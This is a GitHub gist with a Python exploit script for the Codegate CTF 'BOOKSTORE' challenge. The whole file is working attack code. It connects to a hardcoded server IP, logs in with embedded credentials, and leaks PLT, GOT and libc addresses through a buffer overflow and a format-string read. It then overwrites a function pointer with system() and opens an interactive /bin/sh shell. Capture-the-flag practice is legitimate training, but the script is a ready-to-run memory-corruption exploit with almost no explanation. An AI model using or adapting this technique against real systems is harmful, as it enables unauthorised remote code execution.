Skip to content

Instantly share code, notes, and snippets.

@eboda eboda/exploit.py

Created Mar 17, 2015
Embed
What would you like to do?
codegate ctf BOOKSTORE exploit
#!/usr/bin/env python
#coding: UTF-8
import struct
import socket
import telnetlib
import sys
if len(sys.argv) > 1 and sys.argv[1] == "l":
print "=== local exploit"
system_offset = 0xd0f0
TARGET = ('localhost', 31337)
else:
print "=== remote exploit"
system_offset = 0xcf70
TARGET = ('54.65.210.251', 31337)
def e(s):
return s.encode('UTF-8')
def d(s):
return s.decode('UTF-8')
def p(d, fmt='<I'):
return struct.pack(fmt, d)
def u(d, fmt='<I'):
return struct.unpack(fmt, d)
def u1(d, fmt='<I'):
return u(d, fmt)[0]
def readtil(delim):
buf = b''
while not e(delim) in buf:
buf += s.recv(1)
return buf
def read(num):
return s.recv(num)
def sendln(b):
s.sendall(str(b) + b'\n')
def send(b):
s.sendall(b)
###########################################################################
def start_modify(book_id):
sendln("2")
readtil(" : ")
sendln(str(book_id))
readtil("u!\n")
def modify_info(stock, price, shipping, available, name, description):
print "\t- Modify Information"
sendln("3")
readtil(" : \n")
sendln(stock)
readtil(" : \n")
sendln(price)
readtil(") \n")
sendln(shipping)
readtil(" :\n")
sendln(available)
readtil("name\n")
sendln(name)
readtil("ion\n")
sendln(description)
readtil("u!\n")
def display_info(book_id):
print "\t- Display Info"
sendln("3")
readtil(" : ")
sendln(book_id)
return readtil("> ")
def create_book(name, description):
print "\t- Create Book"
sendln("1")
readtil(": \n")
sendln(name)
readtil(": \n")
sendln(description)
readtil(")\n")
sendln("0")
readtil("> ")
def modify_shipping(shipping):
print "\t- Modify Shipping"
sendln("4")
readtil(")\n")
sendln(shipping)
readtil("u!\n")
def modify_description(desc):
print "\t- Modify Description"
sendln("2")
readtil("ion\n")
sendln(desc + "\x00")
readtil("u!\n")
def main_menu():
sendln("0")
readtil("> ")
def pwn():
global s
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.setsockopt( socket.IPPROTO_TCP, socket.TCP_NODELAY, 1 )
s.connect(TARGET)
# Login
print "[x] Login"
readtil(" : ")
send("helloadmin")
readtil(" : ")
send("iulover!@#$")
readtil("> ")
create_book("book1", "description of book1")
# first leak printf@plt and printf@got address
start_modify(0)
modify_info(99999999, 99999999, 1, 1, "AAAAAAAAAAAAAAAAAAAAAAA", "AAAAAAAAAAAA")
main_menu()
name = display_info("0").split("name : '")[1]
print_shipping = u1(name[28:32])
printf_plt = print_shipping - 0x32d
printf_got = printf_plt + 0x3990
print "[x] printf@plt " + hex(printf_plt)
print "[x] printf@got " + hex(printf_got)
# read printf@libc address from printf@got
create_book("book2", "desc2")
start_modify(1)
payload_printf_libc = "A" * 2672 + p(printf_plt) + "\n"
modify_description(payload_printf_libc)
modify_info(9999999, 999999999, 0, 1, "aaaa" + p(printf_got) +"%11$s", "A")
modify_shipping(1)
main_menu()
# fetch printf@libc and calculate system@libc with offset
printf_libc = u1(display_info(1).split("aaaa")[1][4:8])
system_libc = printf_libc - system_offset
print "[x] printf@libc " + hex(printf_libc)
print "[x] system@libc " + hex(system_libc)
# final exploit, simply call system() and provide /bin/sh as name
start_modify(1)
payload_exploit = "A" * 2672 + p(system_libc) + "\n"
modify_description(payload_exploit)
modify_info(99999999, 99999999, 0, 1, "/bin/sh\x00", "xyz")
modify_shipping(1)
main_menu()
print "[x] your shell:"
sendln(3)
readtil(" : ")
sendln(1)
readtil("xyz")
# interact with shell
t = telnetlib.Telnet()
t.sock = s
t.interact()
pwn()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.